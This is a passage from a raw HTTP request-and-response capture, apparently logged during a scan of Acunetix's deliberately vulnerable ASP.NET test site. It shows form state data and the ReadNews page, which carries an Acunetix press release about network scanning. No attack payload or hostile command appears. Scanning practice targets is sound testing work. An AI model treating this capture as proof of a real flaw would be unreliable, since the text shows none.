lZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2FM3rUCxcfpdy3AdSqGMGh3aLpuYg%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjZGRkfC/V3VUyYDVyDam3PHmHmEHBfQA=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKZgbWNCQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+Ak/h9oIkGZGh4+qj2I+T7ihtiWg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" 